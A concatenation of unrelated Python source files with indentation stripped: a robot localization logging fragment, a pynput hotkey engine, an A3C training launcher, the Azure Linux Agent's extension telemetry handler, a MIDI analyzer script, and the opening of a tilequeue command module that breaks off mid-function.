if ("mapa" in kwargs) and ("rox" in kwargs) and ("roy" in kwargs) and ("rotheta" in kwargs) and ("Rk" in kwargs):
mu, sigma = self.localizacion_probabilistica(kwargs["mapa"], kwargs["rox"], kwargs["roy"], kwargs["rotheta"], kwargs["Rk"])
self.f.write(str(mu[0][0])+" "+str(mu[1][0])+" "+str(mu[2][0])+" "+str(sigma[0][0])+" "+str(sigma[0][1])+" "+str(sigma[0][2])+" "+str(sigma[1][0])+" "+str(sigma[1][1])+" "+str(sigma[1][2])+" "+str(sigma[2][0])+" "+str(sigma[2][1])+" "+str(sigma[2][2])+" ")
self.f.write("\n")
sleep(tiempo)
self.t.stop()
self.fin_escribir_fichero = True
self.f = open(nombre_fichero,"w")
self.escribir_fichero_activo = True
self.fin_escribir_fichero = False
self.id_hilo_fichero = Thread(target = hilo_fichero)
self.id_hilo_fichero.start()
def parar_fichero(self):
self.escribir_fichero_activo = False
if not self.fin_escribir_fichero:
self.id_hilo_fichero.join(timeout=None)
self.f.close()
|
engine.py
|
# =======================================================================================
# \ | | __ __| _ \ | / __| \ \ / __|
# _ \ | | | ( | . < _| \ / \__ \
# @autor: Luis Monteiro _/ _\ \__/ _| \___/ _|\_\ ___| _| ____/
# =======================================================================================
from pynput import keyboard
from multiprocessing import Process
from pyperclip import copy, paste
from time import time
# =======================================================================================
# Helpers
# =======================================================================================
def is_equal(seq1, seq2):
return list(seq1) == list(seq2)
def is_subset(sub, seq):
return all(map(lambda p: p in seq, sub))
def is_subseq(sub, seq):
return len(sub) <= len(seq) and all(map(lambda x, y: x==y, sub, seq))
# =======================================================================================
# Clipboard
# =======================================================================================
class MyException(Exception): pass
class Clipboard:
@classmethod
def Stage(cls, text):
Process(target=cls.Revert, args=(paste(),), daemon=True).start()
copy(text)
@classmethod
def Revert(cls, text):
def on_release(key):
copy(text)
exit(0)
# start listener
with keyboard.Listener(on_release=on_release) as listener:
listener.join()
# =======================================================================================
# Keyboard
# =======================================================================================
class Keyboard:
_controler = keyboard.Controller()
@classmethod
def Type(cls, text=None, backoff=0, enter=False):
for _ in range(backoff):
cls.click(keyboard.Key.backspace)
if text:
cls._controler.type(text)
if enter:
cls.click(keyboard.Key.enter)
@classmethod
def click(cls, key):
cls._controler.press(key)
cls._controler.release(key)
# Public Keys
SHIFT = keyboard.Key.shift
CTRL = keyboard.Key.ctrl
ALT = keyboard.Key.alt
CMD = keyboard.Key.cmd
KEY = lambda x : keyboard.KeyCode(char=x)
# =======================================================================================
# Keys
# =======================================================================================
class Keys:
def __init__(self, *args):
self._keys = tuple(args)
def __len__(self):
return len(self._keys)
def press(self, key, char): pass
def release(self, key, char): pass
def reset(self): pass
# =======================================================================================
# HotKeys
# =======================================================================================
class HotKeys(Keys):
MAX_LIVES = 5
def __init__(self, *args):
super().__init__(*args)
self.reset()
def press(self, key, _):
if key not in self._press:
self._press.append(key)
if not is_subset(self._press, self._keys):
self._active = False
self._lives -= 1
return
if not is_subset(self._keys, self._press):
self._active = None
return
self._active = True
def release(self, key, _):
self._press = list(filter(lambda k: k!=key, self._press))
if not self._press or not self._lives:
return self._active
def reset(self):
self._press = []
self._active = None
self._lives = self.MAX_LIVES
# =======================================================================================
# SeqKeys
# =======================================================================================
class SeqKeys(Keys):
def __init__(self, *args):
super().__init__(*args)
self.reset()
def press(self, key, char):
if key not in self._press:
self._press.append(key)
self._chars.append(char)
if not is_subseq(self._chars, self._keys):
self._active = False
return
if not is_subseq(self._keys, self._chars):
self._active = None
return
self._active = True
def release(self, key, _):
self._press = list(filter(lambda k: k!=key, self._press))
return self._active
def reset(self):
self._press = []
self._chars = []
self._active = None
# =======================================================================================
# KeyPatterns
# =======================================================================================
class KeyPatterns(keyboard.Listener):
# ---------------------------------------------------------------
# helper
# ---------------------------------------------------------------
class Stack:
def __init__(self, init):
self._stack = [init]
def add(self, obj):
self._stack.append(obj)
def get(self):
return self._stack[-1]
def clr(self):
for step in reversed(self._stack):
for obj in step:
obj.reset()
self._stack = self._stack[:1]
# ---------------------------------------------------------------
# interfaces
# ---------------------------------------------------------------
def __init__(self, config):
super().__init__(
on_press = self._on_press,
on_release = self._on_release)
self._space = config
self._stack = self.Stack(config)
self._board = keyboard.Controller()
def _on_press(self, key):
for comb in self._stack.get():
comb.press(self.canonical(key), key)
def _on_release(self, key):
active = {}
enable = {}
disable = {}
for comb, children in self._stack.get().items():
{
True : enable,
False : disable,
None : active
}[comb.release(self.canonical(key), key)][comb] = children
# move point
if enable:
next = {}
for parent, obj in enable.items():
if callable(obj):
obj(parent)
continue
next.update(obj)
if next:
self._stack.add(next)
else:
self._stack.clr()
return
# do nothing when some are active
if active: return
# reset stack when all are disable
if disable: self._stack.clr()
def _reset(self):
for step in reversed(self._stack):
for obj in step:
obj.reset()
self._stack = [self._space]
|
main.py
|
import logging
import os
import torch
import torch.multiprocessing as mp
import optimizer as my_optim
from config import Params
from envs import create_expansionai_env
from model import ActorCritic
from test import test
from train import train
LOGGING_FORMAT = '%(asctime)s - %(name)s - %(thread)d|%(process)d - %(levelname)s - %(message)s'
logging.basicConfig(format=LOGGING_FORMAT)
# logging.getLogger('Model').setLevel(logging.INFO)
# logging.getLogger('ExpansionAiEnv').setLevel(logging.DEBUG)
logging.getLogger('Train').setLevel(logging.INFO)
logging.getLogger('Test').setLevel(logging.INFO)
# Main run
os.environ['OMP_NUM_THREADS'] = '1' # 1 thread per core
params = Params() # creating the params object from the Params class, that sets all the model parameters
params.max_episode_length = 1_000_000
params.num_processes = 3
torch.manual_seed(params.seed) # setting the seed (not essential)
env = create_expansionai_env(params.env_name, params) # we create an optimized environment thanks to universe
# shared_model is the model shared by the different agents (different threads in different cores)
shared_model = ActorCritic(env.observation_space.shape[0], env.action_space)
# storing the model in the shared memory of the computer, which allows the threads to have access to this shared memory even if they are in different cores
shared_model.share_memory()
# the optimizer is also shared because it acts on the shared model
optimizer = my_optim.SharedAdam(shared_model.parameters(), lr=params.lr)
optimizer.share_memory() # same, we store the optimizer in the shared memory so that all the agents can have access to this shared memory to optimize the model
processes = [] # initializing the processes with an empty list
# making a loop to run all the other processes that will be trained by updating the shared model
for rank in range(0, params.num_processes):
p = mp.Process(target=train, args=(rank, params, shared_model, optimizer))
p.start()
processes.append(p)
# allowing to create the 'test' process with some arguments 'args' passed to the 'test' target function - the 'test' process doesn't update the shared model but uses it on a part of it - torch.multiprocessing.Process runs a function in an independent thread
p = mp.Process(target=test, args=(params.num_processes, params, shared_model))
p.start() # starting the created process p
processes.append(p) # adding the created process p to the list of processes
# creating a pointer that will allow to kill all the threads when at least one of the threads, or main.py will be killed, allowing to stop the program safely
for p in processes:
p.join()
|
extension_telemetry.py
|
# Microsoft Azure Linux Agent
#
# Copyright 2020 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import datetime
import json
import os
import re
import threading
from collections import defaultdict
import azurelinuxagent.common.logger as logger
from azurelinuxagent.common import conf
from azurelinuxagent.common.event import EVENTS_DIRECTORY, TELEMETRY_LOG_EVENT_ID, \
TELEMETRY_LOG_PROVIDER_ID, add_event, WALAEventOperation, add_log_event, get_event_logger
from azurelinuxagent.common.exception import InvalidExtensionEventError
from azurelinuxagent.common.future import ustr
from azurelinuxagent.common.interfaces import ThreadHandlerInterface
from azurelinuxagent.common.telemetryevent import TelemetryEventList, TelemetryEvent, TelemetryEventParam, \
GuestAgentGenericLogsSchema
from azurelinuxagent.ga.exthandlers import HANDLER_NAME_PATTERN
from azurelinuxagent.ga.periodic_operation import PeriodicOperation
def get_extension_telemetry_handler(protocol_util):
return ExtensionTelemetryHandler(protocol_util)
class ExtensionEventSchema(object): # pylint: disable=R0903
"""
Class for defining the schema for Extension Events.
"""
Version = "Version"
Timestamp = "Timestamp"
TaskName = "TaskName"
EventLevel = "EventLevel"
Message = "Message"
EventPid = "EventPid"
EventTid = "EventTid"
OperationId = "OperationId"
class ProcessExtensionTelemetry(PeriodicOperation):
"""
Periodic operation for collecting and sending extension telemetry events to Wireserver.
"""
_EXTENSION_EVENT_COLLECTION_PERIOD = datetime.timedelta(minutes=5)
_EXTENSION_EVENT_FILE_NAME_REGEX = re.compile(r"^(\d+)\.json$", re.IGNORECASE)
# Limits
_MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD = 300
_EXTENSION_EVENT_FILE_MAX_SIZE = 4 * 1024 * 1024 # 4 MB = 4 * 1,048,576 Bytes
_EXTENSION_EVENT_MAX_SIZE = 1024 * 6 # 6Kb or 6144 characters. Limit for the whole event. Prevent oversized events.
_EXTENSION_EVENT_MAX_MSG_LEN = 1024 * 3 # 3Kb or 3072 chars.
_EXTENSION_EVENT_REQUIRED_FIELDS = [attr.lower() for attr in dir(ExtensionEventSchema) if
not callable(getattr(ExtensionEventSchema, attr)) and not attr.startswith("__")]
def __init__(self, protocol_util):
super(ProcessExtensionTelemetry, self).__init__(
name="collect and send extension events",
operation=self._collect_and_send_events,
period=ProcessExtensionTelemetry._EXTENSION_EVENT_COLLECTION_PERIOD)
self._protocol = protocol_util.get_protocol()
def _collect_and_send_events(self):
event_list = self._collect_extension_events()
if len(event_list.events) > 0: # pylint: disable=C1801
self._protocol.report_event(event_list)
def _collect_extension_events(self):
events_list = TelemetryEventList()
extension_handler_with_event_dirs = []
try:
extension_handler_with_event_dirs = self._get_extension_events_dir_with_handler_name(conf.get_ext_log_dir())
if len(extension_handler_with_event_dirs) == 0: # pylint: disable=C1801
logger.verbose("No Extension events directory exist")
return events_list
for extension_handler_with_event_dir in extension_handler_with_event_dirs:
handler_name = extension_handler_with_event_dir[0]
handler_event_dir_path = extension_handler_with_event_dir[1]
self._capture_extension_events(handler_name, handler_event_dir_path, events_list)
except Exception as e: # pylint: disable=C0103
msg = "Unknown error occurred when trying to collect extension events. Error: {0}".format(ustr(e))
add_event(op=WALAEventOperation.ExtensionTelemetryEventProcessing, message=msg, is_success=False)
finally:
# Always ensure that the events directory are being deleted each run,
# even if we run into an error and dont process them this run.
self._ensure_all_events_directories_empty(extension_handler_with_event_dirs)
return events_list
@staticmethod
def _get_extension_events_dir_with_handler_name(extension_log_dir):
"""
Get the full path to events directory for all extension handlers that have one
:param extension_log_dir: Base log directory for all extensions
:return: A list of full paths of existing events directory for all handlers
"""
extension_handler_with_event_dirs = []
for ext_handler_name in os.listdir(extension_log_dir):
# Check if its an Extension directory
if not os.path.isdir(os.path.join(extension_log_dir, ext_handler_name)) \
or re.match(HANDLER_NAME_PATTERN, ext_handler_name) is None:
continue
# Check if EVENTS_DIRECTORY directory exists
extension_event_dir = os.path.join(extension_log_dir, ext_handler_name, EVENTS_DIRECTORY)
if os.path.exists(extension_event_dir):
extension_handler_with_event_dirs.append((ext_handler_name, extension_event_dir))
return extension_handler_with_event_dirs
def _capture_extension_events(self, handler_name, handler_event_dir_path, events_list):
"""
Capture Extension events and add them to the events_list
:param handler_name: Complete Handler Name. Eg: Microsoft.CPlat.Core.RunCommandLinux
:param handler_event_dir_path: Full path. Eg: '/var/log/azure/Microsoft.CPlat.Core.RunCommandLinux/events'
:param events_list: List of captured extension events
"""
convert_to_mb = lambda x: (1.0 * x)/(1000 * 1000)
# Filter out the files that do not follow the pre-defined EXTENSION_EVENT_FILE_NAME_REGEX
event_files = [event_file for event_file in os.listdir(handler_event_dir_path) if
re.match(self._EXTENSION_EVENT_FILE_NAME_REGEX, event_file) is not None]
# Pick the latest files first, we'll discard older events if len(events) > MAX_EVENT_COUNT
event_files.sort(reverse=True)
captured_extension_events_count = 0
dropped_events_with_error_count = defaultdict(int)
for event_file in event_files:
event_file_path = os.path.join(handler_event_dir_path, event_file)
try:
logger.verbose("Processing event file: {0}", event_file_path)
# We only support _EXTENSION_EVENT_FILE_MAX_SIZE=4Mb max file size
event_file_size = os.stat(event_file_path).st_size
if event_file_size > self._EXTENSION_EVENT_FILE_MAX_SIZE:
msg = "Skipping file: {0} as its size is {1:.2f} Mb > Max size allowed {2:.1f} Mb".format(
event_file_path, convert_to_mb(event_file_size),
convert_to_mb(self._EXTENSION_EVENT_FILE_MAX_SIZE))
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
continue
# We support multiple events in a file, read the file and parse events.
parsed_events = self._parse_event_file_and_capture_events(handler_name, event_file_path,
captured_extension_events_count,
dropped_events_with_error_count)
events_list.events.extend(parsed_events)
captured_extension_events_count += len(parsed_events)
# We only allow MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD=300 maximum events per period per handler
if captured_extension_events_count >= self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD:
msg = "Reached max count for the extension: {0}; Max Limit: {1}. Skipping the rest.".format(
handler_name, self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD)
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
break
except Exception as e: # pylint: disable=C0103
msg = "Failed to process event file {0}: {1}", event_file, ustr(e)
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
finally:
os.remove(event_file_path)
if dropped_events_with_error_count is not None and len(dropped_events_with_error_count) > 0: # pylint: disable=C1801
msg = "Dropped events for Extension: {0}; Details:\n\t{1}".format(handler_name, '\n\t'.join(
["Reason: {0}; Dropped Count: {1}".format(k, v) for k, v in dropped_events_with_error_count.items()]))
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
if captured_extension_events_count > 0:
logger.info("Collected {0} events for extension: {1}".format(captured_extension_events_count, handler_name))
@staticmethod
def _ensure_all_events_directories_empty(extension_events_directories):
if len(extension_events_directories) == 0: # pylint: disable=C1801
return
for extension_handler_with_event_dir in extension_events_directories:
event_dir_path = extension_handler_with_event_dir[1]
if not os.path.exists(event_dir_path):
return
err = None
# Delete any residue files in the events directory
for residue_file in os.listdir(event_dir_path):
try:
os.remove(os.path.join(event_dir_path, residue_file))
except Exception as e: # pylint: disable=C0103
# Only log the first error once per handler per run if unable to clean off residue files
err = ustr(e) if err is None else err
if err is not None:
logger.error("Failed to completely clear the {0} directory. Exception: {1}", event_dir_path, err)
def _parse_event_file_and_capture_events(self, handler_name, event_file_path, captured_events_count,
dropped_events_with_error_count):
events_list = []
event_file_time = datetime.datetime.fromtimestamp(os.path.getmtime(event_file_path))
# Read event file and decode it properly
with open(event_file_path, "rb") as fd: # pylint: disable=C0103
event_data = fd.read().decode("utf-8")
# Parse the string and get the list of events
events = json.loads(event_data)
# We allow multiple events in a file but there can be an instance where the file only has a single
# JSON event and not a list. Handling that condition too
if not isinstance(events, list):
events = [events]
for event in events:
try:
events_list.append(self._parse_telemetry_event(handler_name, event, event_file_time))
captured_events_count += 1
except InvalidExtensionEventError as e: # pylint: disable=C0103
# These are the errors thrown if there's an error parsing the event. We want to report these back to the
# extension publishers so that they are aware of the issues.
# The error messages are all static messages, we will use this to create a dict and emit an event at the
# end of each run to notify if there were any errors parsing events for the extension
dropped_events_with_error_count[ustr(e)] += 1
except Exception as e: # pylint: disable=C0103
logger.warn("Unable to parse and transmit event, error: {0}".format(e))
if captured_events_count >= self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD:
break
return events_list
def _parse_telemetry_event(self, handler_name, extension_unparsed_event, event_file_time):
"""
Parse the Json event file and convert it to TelemetryEvent object with the required data.
:return: Complete TelemetryEvent with all required fields filled up properly. Raises if event breaches contract.
"""
extension_event = self._parse_event_and_ensure_it_is_valid(extension_unparsed_event)
# Create a telemetry event, add all common parameters to the event
# and then overwrite all the common params with extension events params if same
event = TelemetryEvent(TELEMETRY_LOG_EVENT_ID, TELEMETRY_LOG_PROVIDER_ID)
event.file_type = "json"
self.add_common_params_to_extension_event(event, event_file_time)
replace_or_add_params = {
GuestAgentGenericLogsSchema.EventName: "{0}-{1}".format(handler_name, extension_event[
ExtensionEventSchema.Version.lower()]),
GuestAgentGenericLogsSchema.CapabilityUsed: extension_event[ExtensionEventSchema.EventLevel.lower()],
GuestAgentGenericLogsSchema.TaskName: extension_event[ExtensionEventSchema.TaskName.lower()],
GuestAgentGenericLogsSchema.Context1: extension_event[ExtensionEventSchema.Message.lower()],
GuestAgentGenericLogsSchema.Context2: extension_event[ExtensionEventSchema.Timestamp.lower()],
GuestAgentGenericLogsSchema.Context3: extension_event[ExtensionEventSchema.OperationId.lower()],
GuestAgentGenericLogsSchema.EventPid: extension_event[ExtensionEventSchema.EventPid.lower()],
GuestAgentGenericLogsSchema.EventTid: extension_event[ExtensionEventSchema.EventTid.lower()]
}
self._replace_or_add_param_in_event(event, replace_or_add_params)
return event
def _parse_event_and_ensure_it_is_valid(self, extension_event):
"""
Parse the Json event from file. Raise InvalidExtensionEventError if the event breaches pre-set contract.
:param extension_event: The json event from file
:return: Verified Json event that qualifies the contract.
"""
clean_string = lambda x: x.strip() if x is not None else x
event_size = 0
key_err_msg = "{0}: {1} not found"
# Convert the dict to all lower keys to avoid schema confusion.
# Only pick the params that we care about and skip the rest.
event = dict((k.lower(), clean_string(v)) for k, v in extension_event.items() if
k.lower() in self._EXTENSION_EVENT_REQUIRED_FIELDS)
# Trim message and only pick the first 3k chars
message_key = ExtensionEventSchema.Message.lower()
if message_key in event:
event[message_key] = event[message_key][:self._EXTENSION_EVENT_MAX_MSG_LEN]
else:
raise InvalidExtensionEventError(
key_err_msg.format(InvalidExtensionEventError.MissingKeyError, ExtensionEventSchema.Message))
if event[message_key] is None or len(event[message_key]) == 0: # pylint: disable=C1801
raise InvalidExtensionEventError(
"{0}: {1} should not be empty".format(InvalidExtensionEventError.EmptyMessageError,
ExtensionEventSchema.Message))
for required_key in self._EXTENSION_EVENT_REQUIRED_FIELDS:
# If all required keys not in event then raise
if not required_key in event:
raise InvalidExtensionEventError(
key_err_msg.format(InvalidExtensionEventError.MissingKeyError, required_key))
# If the event_size > _EXTENSION_EVENT_MAX_SIZE=6k, then raise
if event_size > self._EXTENSION_EVENT_MAX_SIZE:
raise InvalidExtensionEventError(
"{0}: max event size allowed: {1}".format(InvalidExtensionEventError.OversizeEventError,
self._EXTENSION_EVENT_MAX_SIZE))
event_size += len(event[required_key])
return event
@staticmethod
def _replace_or_add_param_in_event(event, replace_or_add_params):
for param in event.parameters:
if param.name in replace_or_add_params:
param.value = replace_or_add_params.pop(param.name)
if not replace_or_add_params:
# All values replaced, return
return
# Add the remaining params to the event
for param_name in replace_or_add_params:
event.parameters.append(TelemetryEventParam(param_name, replace_or_add_params[param_name]))
@staticmethod
def add_common_params_to_extension_event(event, event_time):
reporter = get_event_logger()
reporter.add_common_event_parameters(event, event_time)
class ExtensionTelemetryHandler(ThreadHandlerInterface):
"""
This Handler takes care of fetching the Extension Telemetry events from the {extension_events_dir} and sends it to
Kusto for advanced debuggability.
"""
_THREAD_NAME = "ExtensionTelemetryHandler"
def __init__(self, protocol_util):
self.protocol_util = protocol_util
self.should_run = True
self.thread = None
@staticmethod
def get_thread_name():
return ExtensionTelemetryHandler._THREAD_NAME
def run(self):
logger.info("Start Extension Telemetry service.")
self.start()
def is_alive(self):
return self.thread is not None and self.thread.is_alive()
def start(self):
self.thread = threading.Thread(target=self.daemon)
self.thread.setDaemon(True)
self.thread.setName(ExtensionTelemetryHandler.get_thread_name())
self.thread.start()
def stop(self):
"""
Stop server communication and join the thread to main thread.
"""
self.should_run = False
if self.is_alive():
self.thread.join()
def stopped(self):
return not self.should_run
def daemon(self):
op = ProcessExtensionTelemetry(self.protocol_util) # pylint: disable=C0103
logger.info("Successfully started the {0} thread".format(self.get_thread_name()))
while not self.stopped():
try:
op.run()
except Exception as e: # pylint: disable=C0103
logger.warn(
"An error occurred in the Telemetry Extension thread main loop; will skip the current iteration.\n{0}",
ustr(e))
finally:
PeriodicOperation.sleep_until_next_operation([op])
|
Midi_Analyzer.py
|
from Scripts import Scale
import time
import threading
import mido
from mido import MidiFile, MidiTrack
# https://mido.readthedocs.io/en/latest/midi_files.html
# http://support.ircam.fr/docs/om/om6-manual/co/MIDI-Concepts.html
tracks = []
def print_ports():
# for potential sound generation...
# nonfunctional
inports = mido.get_input_names()
outports = mido.get_output_names()
for i, p in enumerate(inports):
print('Inport: ' + i + ' ' + p)
for i, p in enumerate(outports):
print('Outport: ' + i + ' ' + p)
def print_notes():
for msg in midi_file:
try:
print(f'Channel: {msg.channel} - {msg.type} - Note: {msg.note}({Scale.get_note_name(msg.note)}{msg.note//12 - 1}) - Vol: {msg.velocity} - Time: {msg.time}')
except:
i=0
def print_messages():
for msg in midi_file:
print(msg)
def print_meta_messages():
for msg in midi_file:
if msg.is_meta:
print(msg)
def play_midi(m):
print(f'Loading {m}...')
for msg in m:
time.sleep(msg.time)
try:
print(f'{msg}')
except:
nope = 0
def set_tracks():
print(f'Tracks: {len(midi_file.tracks)}')
for track in midi_file.tracks:
print(track.name)
tracks.append(track)
def print_tracks():
for track in tracks:
print(track.name)
for msg in track:
print(f'{track.name} - {msg}')
def print_tracks_info():
print(f'Tracks: {len(tracks)}')
for track in tracks:
print(track.name)
def play_track(track):
for msg in track:
print(msg)
time.sleep(msg.time)
def play_tracks():
for track in tracks:
thrd = threading.Thread(target=play_track(track))
for msg in track:
print(f'{track}: {msg}')
time.sleep(msg.time)
def get_max_channel():
max = -1
for msg in midi_file:
try:
if msg.channel > max:
max = msg.channel
except:
i = 0
return max
def copy_note(item, n, velocity, length):
item.copy_note(note=n, velocity=velocity, time=length)
def copy_file(file):
mid = MidiFile()
for i, track in enumerate(file.tracks):
mid.tracks.append(MidiTrack())
for msg in track:
if msg.type == 'note_on' or msg.type == 'note_off' or msg.type == 'program_change':
mid.tracks[i].append(msg.copy())
filename = '../generated.mid'
mid.save(filename)
return filename
file_name = '../../Example MIDI Files/Mario_something.mid'
midi_file = MidiFile(file_name)
print_messages()
|
command.py
|
from __future__ import absolute_import
from collections import defaultdict
from collections import namedtuple
from contextlib import closing
from itertools import chain
from ModestMaps.Core import Coordinate
from multiprocessing.pool import ThreadPool
from random import randrange
from tilequeue.config import create_query_bounds_pad_fn
from tilequeue.config import make_config_from_argparse
from tilequeue.format import lookup_format_by_extension
from tilequeue.metro_extract import city_bounds
from tilequeue.metro_extract import parse_metro_extract
from tilequeue.process import process
from tilequeue.process import Processor
from tilequeue.query import DBConnectionPool
from tilequeue.query import make_data_fetcher
from tilequeue.queue import make_sqs_queue
from tilequeue.queue import make_visibility_manager
from tilequeue.store import make_store
from tilequeue.tile import coord_children_range
from tilequeue.tile import coord_int_zoom_up
from tilequeue.tile import coord_is_valid
from tilequeue.tile import coord_marshall_int
from tilequeue.tile import coord_unmarshall_int
from tilequeue.tile import create_coord
from tilequeue.tile import deserialize_coord
from tilequeue.tile import metatile_zoom_from_str
from tilequeue.tile import seed_tiles
from tilequeue.tile import serialize_coord
from tilequeue.tile import tile_generator_for_multiple_bounds
from tilequeue.tile import tile_generator_for_range
from tilequeue.tile import tile_generator_for_single_bounds
from tilequeue.tile import zoom_mask
from tilequeue.toi import load_set_from_fp
from tilequeue.toi import save_set_to_fp
from tilequeue.top_tiles import parse_top_tiles
from tilequeue.utils import grouper
from tilequeue.utils import parse_log_file
from tilequeue.utils import time_block
from tilequeue.utils import AwsSessionHelper
from tilequeue.worker import DataFetch
from tilequeue.worker import ProcessAndFormatData
from tilequeue.worker import QueuePrint
from tilequeue.worker import S3Storage
from tilequeue.worker import TileQueueReader
from tilequeue.worker import TileQueueWriter
from urllib2 import urlopen
from zope.dottedname.resolve import resolve
import argparse
import datetime
import logging
import logging.config
import multiprocessing
import operator
import os
import os.path
import Queue
import signal
import sys
import threading
import time
import traceback
import yaml
def create_coords_generator_from_tiles_file(fp, logger=None):
for line in fp:
line = line.strip()
if not line:
continue
coord = deserialize_coord(line)
if coord is None:
if logger is not None:
logger.warning('Could not parse coordinate from line: ' % line)
continue
yield coord
def lookup_formats(format_extensions):
formats = []
for extension in format_extensions:
format = lookup_format_by_extension(extension)
assert format is not None, 'Unknown extension: %s' % extension
formats.append(format)
return formats
def uniquify_generator(generator):
s = set(generator)
for tile in s:
yield tile
class GetSqsQueueNameForZoom(object):
def __init__(self, zoom_queue_table):
self.zoom_queue_table = zoom_queue_table
def __call__(self, zoom):
assert isinstance(zoom, (int, long))
assert 0 <= zoom <= 20
result = self.zoom_queue_table.get(zoom)
assert result is not None, 'No queue name found for zoom: %d' % zoom
return result
def make_get_queue_name_for_zoom(zoom_queue_map_cfg, queue_names):
zoom_to_queue_name_table = {}
for zoom_range, queue_name in zoom_queue_map_cfg.items():
assert queue_name in queue_names
assert '-' in zoom_range, 'Invalid zoom range: %s' % zoom_range
zoom_fields = zoom_range.split('-')
assert len(zoom_fields) == 2, 'Invalid zoom range: %s' % zoom_range
zoom_start_str, zoom_until_str = zoom_fields
try:
zoom_start = int(zoom_start_str)
zoom_until = int(zoom_until_str)
except (ValueError, KeyError):
assert not 'Invalid zoom range: %s' % zoom_range
assert (0 <= zoom_start <= 20 and
0 <= zoom_until <= 20 and
zoom_start <= zoom_until), \
'Invalid zoom range: %s' % zoom_range
for i in range(zoom_start, zoom_until + 1):
assert i not in zoom_to_queue_name_table, \
'Overlapping zoom range: %s' % zoom_range
zoom_to_queue_name_table[i] = queue_name
result = GetSqsQueueNameForZoom(zoom_to_queue_name_table)
return result
def make_queue_mapper(queue_mapper_yaml, tile_queue_name_map, toi):
queue_mapper_type = queue_mapper_yaml.get('type')
assert queue_mapper_type, 'Missing queue mapper type'
if queue_mapper_type == 'single':
queue_name = queue_mapper_yaml.get('name')
assert queue_name, 'Missing queue name in queue mapper config'
tile_queue = tile_queue_name_map.get(queue_name)
assert tile_queue, 'No queue found in mapping for %s' % queue_name
return make_single_queue_mapper(queue_name, tile_queue)
elif queue_mapper_type == 'multiple':
multi_queue_map_yaml = queue_mapper_yaml.get('multiple')
assert multi_queue_map_yaml, \
'Missing yaml config for multiple queue mapper'
assert isinstance(multi_queue_map_yaml, list), \
'Mulitple queue mapper config should be a list'
return make_multi_queue_group_mapper_from_cfg(
multi_queue_map_yaml, tile_queue_name_map, toi)
else:
assert 0, 'Unknown queue mapper type: %s' % queue_mapper_type
def make_multi_queue_group_mapper_from_cfg(
multi_queue_map_yaml, tile_queue_name_map, toi):
from tilequeue.queue.mapper import ZoomRangeAndZoomGroupQueueMapper
from tilequeue.queue.mapper import ZoomRangeQueueSpec
zoom_range_specs = []
for zoom_range_spec_yaml in multi_queue_map_yaml:
start_zoom = zoom_range_spec_yaml.get('start-zoom')
end_zoom = zoom_range_spec_yaml.get('end-zoom')
if start_zoom is not None and end_zoom is not None:
assert isinstance(start_zoom, int)
assert isinstance(end_zoom, int)
assert start_zoom < end_zoom
else:
start_zoom = None
end_zoom = None
queue_name = zoom_range_spec_yaml['queue-name']
queue = tile_queue_name_map[queue_name]
group_by_zoom = zoom_range_spec_yaml.get('group-by-zoom')
in_toi = zoom_range_spec_yaml.get('in_toi')
assert group_by_zoom is None or isinstance(group_by_zoom, int)
zrs = ZoomRangeQueueSpec(
start_zoom, end_zoom, queue_name, queue, group_by_zoom,
in_toi)
zoom_range_specs.append(zrs)
queue_mapper = ZoomRangeAndZoomGroupQueueMapper(
zoom_range_specs, toi=toi)
return queue_mapper
def make_single_queue_mapper(queue_name, tile_queue):
from tilequeue.queue.mapper import SingleQueueMapper
queue_mapper = SingleQueueMapper(queue_name, tile_queue)
return queue_mapper
def make_message_marshaller(msg_marshall_yaml_cfg):
msg_mar_type = msg_marshall_yaml_cfg.get('type')
assert msg_mar_type, 'Missing message marshall type in config'
if msg_mar_type == 'single':
from tilequeue.queue.message import SingleMessageMarshaller
return SingleMessageMarshaller()
elif msg_mar_type == 'multiple':
from tilequeue.queue.message import CommaSeparatedMarshaller
return CommaSeparatedMarshaller()
else:
assert 0, 'Unknown message marshall type: %s' % msg_mar_type
def make_inflight_manager(inflight_yaml, redis_client=None):
if not inflight_yaml:
from tilequeue.queue.inflight import NoopInFlightManager
return NoopInFlightManager()
inflight_type = inflight_yaml.get('type')
assert inflight_type, 'Missing inflight type config'
if inflight_type == 'redis':
assert redis_client, 'redis client required for redis inflight manager'
inflight_key = 'tilequeue.in-flight'
inflight_redis_cfg = inflight_yaml.get('redis')
if inflight_redis_cfg:
inflight_key = inflight_redis_cfg.get('key') or inflight_key
from tilequeue.queue.inflight import RedisInFlightManager
return RedisInFlightManager(redis_client, inflight_key)
else:
assert 0, 'Unknown inflight type: %s' % inflight_type
def make_visibility_mgr_from_cfg(visibility_yaml):
assert visibility_yaml, 'Missing message-visibility config'
extend_secs = visibility_yaml.get('extend-seconds')
assert extend_secs > 0, \
'Invalid message-visibility extend-seconds'
max_secs = visibility_yaml.get('max-seconds')
assert max_secs is not None, \
'Invalid message-visibility max-seconds'
timeout_secs = visibility_yaml.get('timeout-seconds')
assert timeout_secs is not None, \
'Invalid message-visibility timeout-seconds'
visibility_extend_mgr = make_visibility_manager(
extend_secs, max_secs, timeout_secs)
return visibility_extend_mgr
def make_sqs_queue_from_cfg(name, queue_yaml_cfg, visibility_mgr):
region = queue_yaml_cfg.get('region')
assert region, 'Missing queue sqs region'
tile_queue = make_sqs_queue(name, region, visibility_mgr)
return tile_queue
def make_tile_queue(queue_yaml_cfg, all_cfg, redis_client=None):
# return a tile_queue, name instance, or list of tilequeue, name pairs
# alternatively maybe should force queue implementations to know
# about their names?
